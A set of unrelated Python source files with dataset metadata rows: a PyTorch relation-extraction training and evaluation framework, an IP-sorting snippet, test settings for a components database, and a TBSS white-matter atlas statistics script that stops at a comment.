def _to_triple(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
# print("lang:{} A:{}".format(lang, triple))
if lang is 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
# print("B:{}".format(triple))
if head_only:
_h = triple[0].split(" ")
_t = triple[2].split(" ")
ret.add(tuple((_h[0], triple[1], _t[0])))
else:
ret.add(tuple((triple[0], triple[1], triple[2])))
return ret
def _load_gold_data(data_gold, data_id, head_only=False, gold_type='EP', lang='ENGLISH'):
_tokens, _triples = data_gold[data_id]
if gold_type == 'EP':
gold_value = _to_ep(_triples, head_only, lang=lang)
elif gold_type == 'sub':
gold_value = _to_sub(_triples, head_only, lang=lang)
elif gold_type == 'obj':
gold_value = _to_obj(_triples, head_only, lang=lang)
elif gold_type == 'ALL':
gold_value = _to_triple(_triples, head_only, lang=lang)
return gold_value, _tokens
def _cal_prf(correct_num, predict_num, gold_num):
eval_p = correct_num / (predict_num + 1e-10)
eval_r = correct_num / (gold_num + 1e-10)
eval_f = 2 * eval_p * eval_r / (eval_p + eval_r + 1e-10)
return eval_p, eval_r, eval_f
class Framework(object):
def __init__(self, con, wandb_log):
self.config = con
self.wandb_log = wandb_log
def train(self, model_pattern):
# initialize the model
ori_model = model_pattern(self.config)
ori_model.cuda()
# define the optimizer
optimizer = optim.Adam(filter(lambda p: p.requires_grad, ori_model.parameters()), lr=self.config.learning_rate)
# whether use multi GPU
if self.config.multi_gpu:
model = nn.DataParallel(ori_model)
else:
model = ori_model
# define the loss function
def loss(gold, pred, mask):
pred = pred.squeeze(-1)
los = F.binary_cross_entropy(pred, gold, reduction='none')
if mask is None:
los = torch.sum(los)/self.config.rel_num
return los
if los.shape != mask.shape:
mask = mask.unsqueeze(-1)
los = torch.sum(los * mask) / torch.sum(mask)
return los
# check the checkpoint dir
if not os.path.exists(self.config.checkpoint_dir):
os.mkdir(self.config.checkpoint_dir)
# get the data loader
train_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.train_prefix, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
dev_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.dev_prefix, is_test=True, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
test_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer,
prefix=self.config.test_prefix, is_test=True,
collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
model.train()
global_step = 0
loss_sum = 0
ent_boundary_loss_sum = 0
ent_span_loss_sum = 0
ent_pair_loss_sum = 0
rel_loss_sum = 0
best_f1_score = -1
best_test_f1 = 0
best_test_h_f1 = 0
best_epoch = 0
# the training loop
for epoch in range(self.config.max_epoch):
train_data_prefetcher = data_loader.DataPreFetcher(train_data_loader)
data = train_data_prefetcher.next()
while data is not None:
if self.config.model_name == 'SGCN' or self.config.model_name == 'SGCN_NO_STEP':
pred_sub_heads, pred_sub_tails, pred_obj_heads, pred_obj_tails, \
sim_sub_h2t, sim_sub_t2h, sim_obj_h2t, sim_obj_t2h, \
sim_sub_oh, sim_sub_ot, sim_obj_sh, sim_obj_st, pred_rels = model(data)
# entity boundary loss
loss_sub_heads = loss(data['em_sub_heads'], pred_sub_heads, mask=data['mask'])
loss_sub_tails = loss(data['em_sub_tails'], pred_sub_tails, mask=data['mask'])
loss_obj_heads = loss(data['em_obj_heads'], pred_obj_heads, mask=data['mask'])
loss_obj_tails = loss(data['em_obj_tails'], pred_obj_tails, mask=data['mask'])
# entity span loss
loss_sub_h2t = loss(data['sub_h2t'], sim_sub_h2t, mask=data['mask'])
loss_sub_t2h = loss(data['sub_t2h'], sim_sub_t2h, mask=data['mask'])
loss_obj_h2t = loss(data['obj_h2t'], sim_obj_h2t, mask=data['mask'])
loss_obj_t2h = loss(data['obj_t2h'], sim_obj_t2h, mask=data['mask'])
# entity pair loss
loss_sub2objh = loss(data['sub2obj_h'], sim_sub_oh, mask=data['mask'])
loss_sub2objt = loss(data['sub2obj_t'], sim_sub_ot, mask=data['mask'])
loss_obj2subh = loss(data['obj2sub_h'], sim_obj_sh, mask=data['mask'])
loss_obj2subt = loss(data['obj2sub_t'], sim_obj_st, mask=data['mask'])
# relation loss
loss_rel = loss(data['rel_labels'], pred_rels, mask=None)
ent_boundary_loss = loss_sub_heads + loss_sub_tails + loss_obj_heads + loss_obj_tails
ent_span_loss = loss_sub_h2t + loss_sub_t2h + loss_obj_h2t + loss_obj_t2h
ent_pair_loss = loss_sub2objh + loss_sub2objt + loss_obj2subh + loss_obj2subt
total_loss = ent_boundary_loss + ent_span_loss + ent_pair_loss + loss_rel
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
global_step += 1
loss_sum += total_loss.item()
ent_boundary_loss_sum += ent_boundary_loss.item()
ent_span_loss_sum += ent_span_loss.item()
ent_pair_loss_sum += ent_pair_loss.item()
rel_loss_sum += loss_rel.item()
if global_step % self.config.period == 0:
# print(loss_sum)
if self.wandb_log is not None:
self.wandb_log.log({"LOSS_SUM:": loss_sum})
loss_sum = 0
ent_boundary_loss_sum = 0
ent_span_loss_sum = 0
ent_pair_loss_sum = 0
rel_loss_sum = 0
data = train_data_prefetcher.next()
elif self.config.model_name == 'Casrel':
pred_sub_heads, pred_sub_tails, pred_s2ro_heads, pred_s2ro_tails = model(data)
# entity boundary loss
loss_sub_heads = loss(data['em_sub_heads'], pred_sub_heads, mask=data['mask'])
loss_sub_tails = loss(data['em_sub_tails'], pred_sub_tails, mask=data['mask'])
# relation loss
loss_s2ro_heads = loss(data['batch_s2ro_heads'], pred_s2ro_heads, mask=data['mask'])
loss_s2ro_tails = loss(data['batch_s2ro_tails'], pred_s2ro_tails, mask=data['mask'])
ent_boundary_loss = loss_sub_heads + loss_sub_tails
rel_loss = loss_s2ro_heads + loss_s2ro_tails
total_loss = ent_boundary_loss + rel_loss
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
global_step += 1
loss_sum += total_loss.item()
ent_boundary_loss_sum += ent_boundary_loss.item()
rel_loss_sum += rel_loss.item()
if global_step % self.config.period == 0:
if self.wandb_log is not None:
self.wandb_log.log({"LOSS_SUM:": loss_sum})
loss_sum = 0
ent_boundary_loss_sum = 0
ent_span_loss_sum = 0
ent_pair_loss_sum = 0
rel_loss_sum = 0
data = train_data_prefetcher.next()
if (epoch + 1) % self.config.test_epoch == 0:
model.eval()
# call the test function
dev_triple_p, dev_triple_r, dev_triple_f, dev_triple_hp, dev_triple_hr, dev_triple_hf, \
dev_ep_p, dev_ep_r, dev_ep_f, dev_ep_hp, dev_ep_hr, dev_ep_hf, \
dev_sub_p, dev_sub_r, dev_sub_f, dev_sub_hp, dev_sub_hr, dev_sub_hf, \
dev_obj_p, dev_obj_r, dev_obj_f, dev_obj_hp, dev_obj_hr, dev_obj_hf = self.test(dev_data_loader, self.config.step_dim, self.config.step_matrix, model)
test_triple_p, test_triple_r, test_triple_f, test_triple_hp, test_triple_hr, test_triple_hf, \
test_ep_p, test_ep_r, test_ep_f, test_ep_hp, test_ep_hr, test_ep_hf, \
test_sub_p, test_sub_r, test_sub_f, test_sub_hp, test_sub_hr, test_sub_hf, \
test_obj_p, test_obj_r, test_obj_f, test_obj_hp, test_obj_hr, test_obj_hf = self.test(test_data_loader,
self.config.step_dim,
self.config.step_matrix,
model)
model.train()
# eval_f1_score
if dev_triple_f > best_f1_score:
best_epoch = epoch
best_f1_score = dev_triple_f
best_test_h_f1 = test_triple_hf
best_test_f1 = test_triple_f
# save the best model
path = os.path.join(self.config.checkpoint_dir, self.config.model_save_name)
if not self.config.debug:
torch.save(ori_model.state_dict(), path)
if self.wandb_log is not None:
self.wandb_log.log({
"BEST_EPOCH:": best_epoch,
"DEV_Triple_F1": dev_triple_f,
"DEV_TripleH_F1": dev_triple_hf,
"DEV_EP_F1": dev_ep_f,
"DEV_SUB_F1": dev_sub_f,
"DEV_OBJ_F1": dev_obj_f,
"DEV_EPH_F1": dev_ep_hf,
"DEV_SUBH_F1": dev_sub_hf,
"DEV_OBJH_F1": dev_obj_hf,
"best_test_h_f1": best_test_h_f1,
"best_test_f1": best_test_f1,
"current_epoch": epoch})
# manually release the unused cache
torch.cuda.empty_cache()
def cal_sub_prob(self, head_idx, tail_idx, trans_head_idx, trans_tail_idx, pred_heads, pred_tails, head_walk_step, tail_walk_step, model, encoded_txt, seq_len):
_head_prob = pred_heads[0][head_idx][0].tolist()
_tail_prob = pred_tails[0][tail_idx][0].tolist()
_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_head_mapping[0][0][head_idx] = 1
_tail_mapping[0][0][tail_idx] = 1
_head_mapping = _head_mapping.to(encoded_txt)
_tail_mapping = _tail_mapping.to(encoded_txt)
sub_span = model.gen_span_emb(torch.LongTensor([head_idx]), torch.LongTensor([tail_idx]), encoded_txt)
# predict entity span
sim_ent_ht, sim_ent_th = model.sub_span_trans(_head_mapping, _tail_mapping, head_walk_step, tail_walk_step, encoded_txt, seq_len)
_h2t_prob = sim_ent_ht[0][tail_idx][0].tolist()
_t2h_prob = sim_ent_th[0][head_idx][0].tolist()
# span_prob = _head_prob * _h2t_prob + _tail_prob * _t2h_prob
# trans head idx
sim_ent_gh, sim_ent_gt = model.sub_entity_trans(sub_span, head_walk_step, tail_walk_step, encoded_txt, seq_len)
trans_head_prob = sim_ent_gh[0][trans_head_idx][0].tolist()
trans_tail_prob = sim_ent_gt[0][trans_tail_idx][0].tolist()
return _head_prob, _h2t_prob, _tail_prob, _t2h_prob, trans_head_prob, trans_tail_prob
def cal_obj_prob(self, head_idx, tail_idx, trans_head_idx, trans_tail_idx, pred_heads, pred_tails, head_walk_step, tail_walk_step, model, encoded_txt, seq_len):
_head_prob = pred_heads[0][head_idx][0].tolist()
_tail_prob = pred_tails[0][tail_idx][0].tolist()
_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_head_mapping[0][0][head_idx] = 1
_tail_mapping[0][0][tail_idx] = 1
_head_mapping = _head_mapping.to(encoded_txt)
_tail_mapping = _tail_mapping.to(encoded_txt)
obj_span = model.gen_span_emb(torch.LongTensor([head_idx]), torch.LongTensor([tail_idx]), encoded_txt)
# predict entity span
sim_ent_ht, sim_ent_th = model.obj_span_trans(_head_mapping, _tail_mapping, head_walk_step, tail_walk_step, encoded_txt, seq_len)
_h2t_prob = sim_ent_ht[0][tail_idx][0].tolist()
_t2h_prob = sim_ent_th[0][head_idx][0].tolist()
# span_prob = _head_prob * _h2t_prob + _tail_prob * _t2h_prob
# trans head idx
sim_ent_gh, sim_ent_gt = model.obj_entity_trans(obj_span, head_walk_step, tail_walk_step, encoded_txt, seq_len)
trans_head_prob = sim_ent_gh[0][trans_head_idx][0].tolist()
trans_tail_prob = sim_ent_gt[0][trans_tail_idx][0].tolist()
return _head_prob, _h2t_prob, _tail_prob, _t2h_prob, trans_head_prob, trans_tail_prob
def cal_rel_prob(self, sub_head_idx, sub_tail_idx, obj_head_idx, obj_tail_idx, model, encoded_txt, rel_bar=0.5):
sub_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
sub_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
sub_head_mapping[0][0][sub_head_idx] = 1
sub_tail_mapping[0][0][sub_tail_idx] = 1
sub_head_mapping = sub_head_mapping.to(encoded_txt)
sub_tail_mapping = sub_tail_mapping.to(encoded_txt)
obj_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
obj_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
obj_head_mapping[0][0][obj_head_idx] = 1
obj_tail_mapping[0][0][obj_tail_idx] = 1
obj_head_mapping = obj_head_mapping.to(encoded_txt)
obj_tail_mapping = obj_tail_mapping.to(encoded_txt)
pred_rels = model.rel_classification(sub_head_mapping, sub_tail_mapping, obj_head_mapping, obj_tail_mapping, encoded_txt)
pred_rels_idx = np.where(pred_rels.cpu()[0] > rel_bar)[0]
return pred_rels_idx
def _cal_ep_score(self, sub_span_prob, obj_span_prob, sub_trans_prob, obj_trans_prob):
_score = sub_span_prob*sub_trans_prob + obj_span_prob*obj_trans_prob
return _score
def test(self, x_data_loader, step_dim, step_matrix, model):
test_data_prefetcher = data_loader.DataPreFetcher(x_data_loader)
data = test_data_prefetcher.next()
pred_eps_id = list()
data_id = 0
data_gold = list()
id2rel = json.load(open(os.path.join(self.config.data_path, 'rel2id.json')))[0]
print(id2rel)
def make_step(sample_idx, text_len):
walk_step = np.zeros((text_len, step_dim))
for i in range(text_len):
walk_step[i] = step_matrix[i - sample_idx + self.config.max_len]
walk_step_t = torch.Tensor(walk_step)
walk_step_t = walk_step_t.unsqueeze(0)
walk_step_t = walk_step_t.to(torch.device('cuda'))
return walk_step_t
while data is not None:
with torch.no_grad():
token_ids = data['token_ids']
tokens = data['tokens'][0]
mask = data['mask']
gold_triples = data['triples'][0]
data_gold.append((tokens, gold_triples))
seq_len = len(tokens)
encoded_text = model.get_encoded_text(token_ids, mask)
if self.config.model_name == 'SGCN' or self.config.model_name == 'SGCN_NO_STEP':
pred_sub_heads, pred_sub_tails, pred_obj_heads, pred_obj_tails = model.pred_entity_boundary(encoded_text)
_bar = 0.1
max_span_len = 30
span_sub_heads = np.where(pred_sub_heads.cpu()[0] > _bar)[0]
span_sub_tails = np.where(pred_sub_tails.cpu()[0] > _bar)[0]
span_obj_heads = np.where(pred_obj_heads.cpu()[0] > _bar)[0]
span_obj_tails = np.where(pred_obj_tails.cpu()[0] > _bar)[0]
pred_eps = dict()
for _sub_head_idx in span_sub_heads:
for _sub_tail_idx in span_sub_tails:
for _obj_head_idx in span_obj_heads:
for _obj_tail_idx in span_obj_tails:
if _sub_head_idx <= _sub_tail_idx and _obj_head_idx <= _obj_tail_idx and (_sub_tail_idx - _sub_head_idx) < max_span_len and (_obj_tail_idx - _obj_head_idx) < max_span_len:
sub_head_walk_step = make_step(_sub_head_idx, seq_len)
sub_tail_walk_step = make_step(_sub_tail_idx, seq_len)
obj_head_walk_step = make_step(_obj_head_idx, seq_len)
obj_tail_walk_step = make_step(_obj_tail_idx, seq_len)
# cal span prob and trans prob
sub_head_prob, sub_h2t_prob, sub_tail_prob, sub_t2h_prob, sub_trans_head_prob, sub_trans_tail_prob = \
self.cal_sub_prob(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, pred_sub_heads, pred_sub_tails, sub_head_walk_step, sub_tail_walk_step, model, encoded_text, seq_len)
obj_head_prob, obj_h2t_prob, obj_tail_prob, obj_t2h_prob, obj_trans_head_prob, obj_trans_tail_prob = \
self.cal_obj_prob(_obj_head_idx, _obj_tail_idx, _sub_head_idx, _sub_tail_idx, pred_obj_heads, pred_obj_tails, obj_head_walk_step, obj_tail_walk_step, model, encoded_text, seq_len)
sub_span_prob = sub_head_prob * sub_h2t_prob + sub_tail_prob * sub_t2h_prob
obj_span_prob = obj_head_prob * obj_h2t_prob + obj_tail_prob * obj_t2h_prob
sub_trans_prob = sub_trans_head_prob * sub_trans_tail_prob
obj_trans_prob = obj_trans_head_prob * obj_trans_tail_prob
ep_score = self._cal_ep_score(sub_span_prob, obj_span_prob, sub_trans_prob, obj_trans_prob)
if ep_score > 2.5:
pred_rels_idx = self.cal_rel_prob(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, model, encoded_text)
for rel_idx in pred_rels_idx:
rel_idx = str(rel_idx)
if (_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx]) not in pred_eps:
pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])] = ep_score
else:
if ep_score > pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])]:
pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])] = ep_score
else:
ent_bar = 0.5
rel_bar = 0.5
pred_eps = dict()
pred_sub_heads, pred_sub_tails = model.get_subs(encoded_text)
sub_heads, sub_tails = np.where(pred_sub_heads.cpu()[0] > ent_bar)[0], \
np.where(pred_sub_tails.cpu()[0] > ent_bar)[0]
subjects = []
for sub_head in sub_heads:
sub_tail = sub_tails[sub_tails >= sub_head]
if len(sub_tail) > 0:
sub_tail = sub_tail[0]
subject = tokens[sub_head: sub_tail]
subjects.append((subject, sub_head, sub_tail))
if subjects:
triple_list = []
# [subject_num, seq_len, bert_dim]
repeated_encoded_text = encoded_text.repeat(len(subjects), 1, 1)
# [subject_num, 1, seq_len]
sub_head_mapping = torch.Tensor(len(subjects), 1, encoded_text.size(1)).zero_()
sub_tail_mapping = torch.Tensor(len(subjects), 1, encoded_text.size(1)).zero_()
for subject_idx, subject in enumerate(subjects):
sub_head_mapping[subject_idx][0][subject[1]] = 1
sub_tail_mapping[subject_idx][0][subject[2]] = 1
sub_tail_mapping = sub_tail_mapping.to(repeated_encoded_text)
sub_head_mapping = sub_head_mapping.to(repeated_encoded_text)
pred_obj_heads, pred_obj_tails = model.get_objs_for_specific_sub(sub_head_mapping,
sub_tail_mapping,
repeated_encoded_text)
for subject_idx, subject in enumerate(subjects):
obj_heads, obj_tails = np.where(pred_obj_heads.cpu()[subject_idx] > rel_bar), np.where(pred_obj_tails.cpu()[subject_idx] > rel_bar)
for obj_head, rel_head in zip(*obj_heads):
for obj_tail, rel_tail in zip(*obj_tails):
if obj_head <= obj_tail and rel_head == rel_tail:
ep_score = pred_obj_tails.cpu()[subject_idx][obj_head][rel_head].item()
rel_head = str(rel_head)
if (subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head]) not in pred_eps:
pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])] = ep_score
else:
if ep_score > pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])]:
pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])] = ep_score
break
for _ep in pred_eps:
pred_eps_id.append((_ep[0], _ep[1], _ep[2], _ep[3], pred_eps[_ep], data_id, _ep[4]))
data_id += 1
data = test_data_prefetcher.next()
pred_eps_id = sorted(pred_eps_id, key=lambda x: x[4], reverse=True)
def element_prf(pred_eps_id, data_gold, head_only=False, gold_type='EP', lang='ENGLISH'):
correct_num, pred_num, gold_num = 0, 0, 0
v_pred_entity_pair = set()
# To calculate gold number
for item in data_gold:
gold_triples = item[1]
if gold_type == 'EP':
gold_info = _to_ep(gold_triples, head_only, lang=lang)
elif gold_type == 'sub':
gold_info = _to_sub(gold_triples, head_only, lang=lang)
elif gold_type == 'obj':
gold_info = _to_obj(gold_triples, head_only, lang=lang)
elif gold_type == 'ALL':
gold_info = _to_triple(gold_triples, head_only, lang=lang)
# print(head_only, gold_info)
gold_num += len(gold_info)
# print("gold_type:{}, gold_num:{}".format(gold_type, gold_num))
for _eps_id in pred_eps_id:
gold_results, _tokens = _load_gold_data(data_gold, _eps_id[5], head_only, gold_type, lang=lang)
sub = _tokens[_eps_id[0]: _eps_id[1]+1]
sub = self.config.tokenizer.convert_tokens_to_string(sub)
if lang is 'CHINESE':
sub = sub.replace(' ', '')
sub = sub.replace('$', ' ')
sub = sub.strip().replace(" - ", "-")
if head_only:
sub = sub.split(" ")[0]
obj = _tokens[_eps_id[2]: _eps_id[3]+1]
obj = self.config.tokenizer.convert_tokens_to_string(obj)
# obj = ''.join([i.lstrip("##") for i in obj])
#obj = ' '.join(obj.split('[unused1]'))
obj = obj.strip().replace(" - ", "-")
if lang is 'CHINESE':
obj = obj.replace(' ', '')
obj = obj.replace('$', ' ')
if head_only:
obj = obj.split(" ")[0]
rel = _eps_id[6]
if gold_type == 'EP':
pred_info = (sub, obj, _eps_id[5])
elif gold_type == 'sub':
pred_info = (sub, _eps_id[5])
elif gold_type == 'obj':
pred_info = (obj, _eps_id[5])
elif gold_type == 'ALL':
pred_info = (sub, rel, obj, _eps_id[5])
if pred_info not in v_pred_entity_pair:
v_pred_entity_pair.add(pred_info)
else:
continue
if gold_type == 'EP':
pred_info = (sub, obj)
elif gold_type == 'sub':
pred_info = (sub)
elif gold_type == 'obj':
pred_info = (obj)
elif gold_type == 'ALL':
pred_info = (sub, rel, obj)
# print(head_only, pred_info)
if pred_info in gold_results:
correct_num += 1
#else:
# if gold_type == 'ALL' and head_only == False:
# print("pred_info:{}".format(pred_info))
# print("gold_results:{}".format(gold_results))
pred_num += 1
p, r, f = _cal_prf(correct_num, pred_num, gold_num)
print("gold_type:{} head_only:{} gold_num:{} pred_num:{} correct_num:{}, p:{},r:{},f:{},".format(gold_type, head_only, gold_num, pred_num, correct_num, p, r, f))
return p, r, f
# print(pred_eps_id)
triple_p, triple_r, triple_f = element_prf(pred_eps_id, data_gold, gold_type='ALL', lang=self.config.dataset_lang)
triple_hp, triple_hr, triple_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='ALL', lang=self.config.dataset_lang)
ep_p, ep_r, ep_f = element_prf(pred_eps_id, data_gold, gold_type='EP', lang=self.config.dataset_lang)
ep_hp, ep_hr, ep_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='EP', lang=self.config.dataset_lang)
sub_p, sub_r, sub_f = element_prf(pred_eps_id, data_gold, gold_type='sub', lang=self.config.dataset_lang)
sub_hp, sub_hr, sub_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='sub', lang=self.config.dataset_lang)
obj_p, obj_r, obj_f = element_prf(pred_eps_id, data_gold, gold_type='obj', lang=self.config.dataset_lang)
obj_hp, obj_hr, obj_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='obj', lang=self.config.dataset_lang)
return triple_p, triple_r, triple_f, triple_hp, triple_hr, triple_hf, \
ep_p, ep_r, ep_f, ep_hp, ep_hr, ep_hf, \
sub_p, sub_r, sub_f, sub_hp, sub_hr, sub_hf, \
obj_p, obj_r, obj_f, obj_hp, obj_hr, obj_hf
def testall(self, model_pattern):
model = model_pattern(self.config)
path = os.path.join(self.config.checkpoint_dir, self.config.model_save_name)
model.load_state_dict(torch.load(path))
model.cuda()
model.eval()
test_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.dev_prefix, is_test=True, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
self.test(test_data_loader, self.config.step_dim, self.config.step_matrix, model)
return
| 48.786164 | 223 | 0.561718 | 28,090 | 0.905195 | 0 | 0 | 0 | 0 | 0 | 0 | 2,322 | 0.074826 |
f1c88d2448c823f942e8276b943c094ce146f49b
| 799 |
py
|
Python
|
tests/settings.py
|
rjw57/componentsdb
|
7e5fd96d3afbbcde09d2f7fba1d6c86975e41272
|
[
"MIT"
] | null | null | null |
tests/settings.py
|
rjw57/componentsdb
|
7e5fd96d3afbbcde09d2f7fba1d6c86975e41272
|
[
"MIT"
] | null | null | null |
tests/settings.py
|
rjw57/componentsdb
|
7e5fd96d3afbbcde09d2f7fba1d6c86975e41272
|
[
"MIT"
] | null | null | null |
"""
Settings for application when being run in the test suite.
"""
import os
import sys
# Add the directory containing this file to the search path
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
# Import function to generate a self-signed cert dynamically
from x509cert import gen_self_signed_cert
DEBUG = True
TESTING = True
SECRET_KEY = 'bonjour, monde'
# Configure the testing database. The database URI is specified by the
# COMPONENTSDB_DATABASE_URI environment variable.
SQLALCHEMY_DATABASE_URI = os.environ.get(
'COMPONENTSDB_DATABASE_URI', 'sqlite://'
)
SQLALCHEMY_ECHO = True
_cert, _key = gen_self_signed_cert()
GOOGLE_OAUTH2_CERTS = {'selfsigned': _cert}
GOOGLE_OAUTH2_ALLOWED_CLIENT_IDS = ['my-client']
TESTING_GOOGLE_OAUTH2_CERT_PRIV_KEYS = {'selfsigned': _key}
| 26.633333 | 70 | 0.787234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 394 | 0.493116 |
f1c8a2ea1e6774516b221761cec538d39be7d6c1
| 254 |
py
|
Python
|
learn-python/sort_with_key.py
|
barissimsek/gopython
|
7e2c1bdb20b2a908c601794ea9dbf71ea035a869
|
[
"Apache-2.0"
] | null | null | null |
learn-python/sort_with_key.py
|
barissimsek/gopython
|
7e2c1bdb20b2a908c601794ea9dbf71ea035a869
|
[
"Apache-2.0"
] | null | null | null |
learn-python/sort_with_key.py
|
barissimsek/gopython
|
7e2c1bdb20b2a908c601794ea9dbf71ea035a869
|
[
"Apache-2.0"
] | null | null | null |
ips = [
'10.0.0.5',
'10.5.3.1',
'192.168.11.10',
'2.2.2.2',
'100.0.0.1',
'20.3.2.4'
]
def getKey(item):
return tuple(int(part) for part in item.split('.'))
def sort_ips(iplist):
return sorted(ips, key=getKey)
print(sort_ips(ips))
| 12.095238 | 52 | 0.566929 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 68 | 0.267717 |
f1c983b126df00c8a011720ca60d9fd2cfbf09df
| 5,330 |
py
|
Python
|
tbss_wm_atlas_stats.py
|
shanqing-cai/MRI_analysis
|
39b3d48e2158623ffd9a8a6ea47d16a4a7b83cd9
|
[
"BSD-4-Clause"
] | 1 |
2016-02-08T18:31:36.000Z
|
2016-02-08T18:31:36.000Z
|
tbss_wm_atlas_stats.py
|
shanqing-cai/MRI_analysis
|
39b3d48e2158623ffd9a8a6ea47d16a4a7b83cd9
|
[
"BSD-4-Clause"
] | null | null | null |
tbss_wm_atlas_stats.py
|
shanqing-cai/MRI_analysis
|
39b3d48e2158623ffd9a8a6ea47d16a4a7b83cd9
|
[
"BSD-4-Clause"
] | null | null | null |
#!/usr/bin/python
import os
import sys
import glob
import argparse
import tempfile
import numpy as np
from scipy.io import *
from scipy import stats
from subprocess import Popen, PIPE
from scai_utils import *
from get_qdec_info import get_qdec_info
from read_xml_labels import read_xml_labels
atlas_label_fn = \
"/usr/share/fsl/5.0/data/atlases/JHU/JHU-ICBM-labels-1mm.nii.gz"
atlas_label_xml = \
"/usr/share/fsl/5.0/data/atlases/JHU-labels.xml"
P_THRESH_UNC = 0.05
if __name__ == "__main__":
ap = argparse.ArgumentParser(description="Get stats (e.g., average FA) from in atlas-defined WM regions in TBSS-aligned diffusion-tensor images")
ap.add_argument("tbssDir", help="Base TBSS directory (e.g., /users/cais/STUT/analysis/dt_tbss_dtiprep2)")
if len(sys.argv) == 1:
ap.print_help()
sys.exit(0)
# === Parse input arguments === #
args = ap.parse_args()
tbssDir = args.tbssDir
# === Input sanity check === #
check_dir(tbssDir)
statsDir = os.path.join(tbssDir, "stats")
check_dir(statsDir)
origDir = os.path.join(tbssDir, "origdata")
check_dir(origDir)
check_file(atlas_label_fn)
# === Read JHU-ICBM labels === #
check_file(atlas_label_xml)
labs = read_xml_labels(atlas_label_xml)
# === Locate the all_FA image === #
allFA = os.path.join(statsDir, "all_FA.nii.gz")
check_file(allFA)
# === Find out the subject IDs and their groups === #
origDir = os.path.join(tbssDir, "origdata")
check_dir(origDir)
ds = glob.glob(os.path.join(origDir, "S??.nii.gz"))
ds.sort()
sIDs = []
idxPWS = []
idxPFS = []
for (i0, d) in enumerate(ds):
[tpath, tfn] = os.path.split(d)
sID = tfn.replace(".nii.gz", "")
sIDs.append(sID)
if get_qdec_info(sID, "diagnosis") == "PWS":
idxPWS.append(i0)
elif get_qdec_info(sID, "diagnosis") == "PFS":
idxPFS.append(i0)
else:
raise Exception, "Unrecognized diagnosis for subject %s: %s" % \
(sID, get_qdec_info(sID, "diagnosis"))
# === Split the all_FA image, for later use by fslstats === #
splitBase = tempfile.mktemp()
split_cmd = "fslsplit %s %s -t" % (allFA, splitBase)
saydo(split_cmd)
splitFNs = glob.glob(splitBase + "*.nii.gz")
splitFNs.sort()
if len(splitFNs) != len(sIDs):
raise Exception, "Number of volumes in 4D series %s (%d) does not match the number of subjects in origdata (%d)" % \
(allFA, len(splitFNs), len(sIDs))
# === Iterate through the WM labels and get the stats info === #
labRes = {"labels": [], "meanFA": [], "tt_t": [], "tt_p": []}
for (i0, lab) in enumerate(labs['name']):
ind = labs['ind'][i0]
if ind == 0:
continue
print("\nProcessing label #%d: %s\n" % (i0, lab))
labRes["labels"].append(lab)
labRes["meanFA"].append({"PWS": [], "PFS": []})
tmpfn = tempfile.mktemp() + ".nii.gz"
# == Binarize, get label mask == #
bin_cmd = "mri_binarize --i %s --match %d --o %s" % \
(atlas_label_fn, ind, tmpfn)
saydo(bin_cmd)
check_file(tmpfn)
# == Use fslstats to get the masked mean == #
t_vals = [-1] * len(sIDs)
for (i1, splitFN) in enumerate(splitFNs):
(sout, serr) = Popen(["fslstats", splitFN, "-k", tmpfn, "-m"], \
stdout=PIPE, stderr=PIPE).communicate()
if len(serr) > 0:
raise Exception, \
"ERROR occurred during fslstats on %s" % splitFN
t_vals[i1] = float(sout.split(' ')[0])
t_vals = np.array(t_vals)
labRes["meanFA"][-1]["PWS"] = t_vals[idxPWS]
labRes["meanFA"][-1]["PFS"] = t_vals[idxPFS]
(t, p) = stats.ttest_ind(labRes["meanFA"][-1]["PWS"], \
labRes["meanFA"][-1]["PFS"])
labRes["tt_t"].append(t)
labRes["tt_p"].append(p)
os.system("rm -f %s" % tmpfn)
os.system("rm -f %s*" % splitBase)
# === Save results to mat file === #
resMatFN = "/users/cais/STUT/scripts/tbss_wm_atlas_stats.mat"
os.system("rm -f %s" % resMatFN)
savemat(resMatFN, labRes)
check_file(resMatFN)
print("\nINFO: Results saved to .mat file: %s" % resMatFN)
# === Print results === #
